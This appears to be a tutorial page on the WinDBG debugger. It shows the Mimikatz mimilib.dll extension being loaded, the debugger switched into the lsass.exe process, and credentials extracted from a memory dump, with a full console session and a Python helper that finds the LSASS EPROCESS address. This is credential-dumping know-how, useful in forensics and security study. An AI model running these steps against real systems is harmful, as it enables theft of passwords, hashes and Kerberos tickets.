
WinDBG

WinDBG is a multipurpose debugger for the Microsoft Windows computer operating system, distributed by Microsoft. We can use WinDBG to debug kernel-mode and user-mode code, analyze crash dumps, and examine the CPU registers while the code executes. WinDBG is a powerful tool for debugging and analyzing Windows systems.

Installation

You can download the WinDBG installer from the official Microsoft website. The installer is available for both 32-bit and 64-bit systems.

Extracting Hashes via Mimikatz Plugin

Mimikatz ships a WinDBG extension, mimilib.dll, that can be loaded into the debugger to extract passwords, hashes, PINs, and Kerberos tickets from a memory dump. To extract hashes from a memory dump, follow these steps:

Download mimilib.dll from the Mimikatz GitHub repository. Open WinDBG, load the memory dump file, and then load the extension:

0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
..........................................................
..........................................................
..........................................
Loading User Symbols
.....
Loading unloaded module list
....Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
................
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
    SessionId: 0  Cid: 01dc    Peb: 7fffffd6000  ParentCid: 0188
    DirBase: 137127000  ObjectTable: fffff8a001159230  HandleCount: 660.
    Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
..........................................................
0: kd> !mimikatz

With the debugger switched to the LSASS process context, the Mimikatz plugin extracts the hashes from the memory dump.
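As an added helper that is not part of the original page or of Mimikatz, the following Python parses the PROCESS blocks that `!process 0 0` prints, so that the EPROCESS address needed by `.process /r /p` can be picked out of a saved listing during dump triage instead of being copied by hand. The sample listing is constructed from the lsass.exe block shown above plus a second made-up process, and the names `SAMPLE_PROCESS_LISTING`, `parse_process_listing` and `find_eprocess` are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the lsass.exe block from the page's own session plus a
# second, made-up process, so the parser can be exercised offline.
SAMPLE_PROCESS_LISTING = """\
PROCESS fffffa80072b2b10
    SessionId: 0  Cid: 01dc    Peb: 7fffffd6000  ParentCid: 0188
    DirBase: 137127000  ObjectTable: fffff8a001159230  HandleCount: 660.
    Image: lsass.exe
PROCESS fffffa8006f3a060
    SessionId: 1  Cid: 0b2c    Peb: 7fffffdf000  ParentCid: 0a90
    DirBase: 12c4f3000  ObjectTable: fffff8a002a31e40  HandleCount: 212.
    Image: notepad.exe
"""

_HEADER = re.compile(r"^PROCESS\s+([0-9a-fA-F`]+)\s*$")   # "PROCESS <EPROCESS>"
_FIELD = re.compile(r"([A-Za-z]+):\s+(\S+)")              # "Key: value" pairs


def normalize_address(addr: str) -> str:
    """Drop WinDBG's 64-bit backtick separator: fffffa80`072b2b10 -> fffffa80072b2b10."""
    return addr.replace("`", "").lower()


def parse_process_listing(text: str) -> List[Dict[str, str]]:
    """Parse '!process 0 0' output into dicts keyed by 'Address' plus each 'Key: value' field."""
    procs: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    for line in text.splitlines():
        header = _HEADER.match(line.strip())
        if header:
            current = {"Address": normalize_address(header.group(1))}
            procs.append(current)
            continue
        if current is not None:
            for key, value in _FIELD.findall(line):
                # WinDBG prints a trailing '.' after HandleCount; strip it.
                current[key] = value.rstrip(".")
    return procs


def find_eprocess(text: str, image: str) -> Optional[str]:
    """EPROCESS address of the first process whose Image matches, case-insensitively."""
    for proc in parse_process_listing(text):
        if proc.get("Image", "").lower() == image.lower():
            return proc["Address"]
    return None
```

`find_eprocess(SAMPLE_PROCESS_LISTING, "lsass.exe")` returns the address that the session above passes to `.process /r /p`.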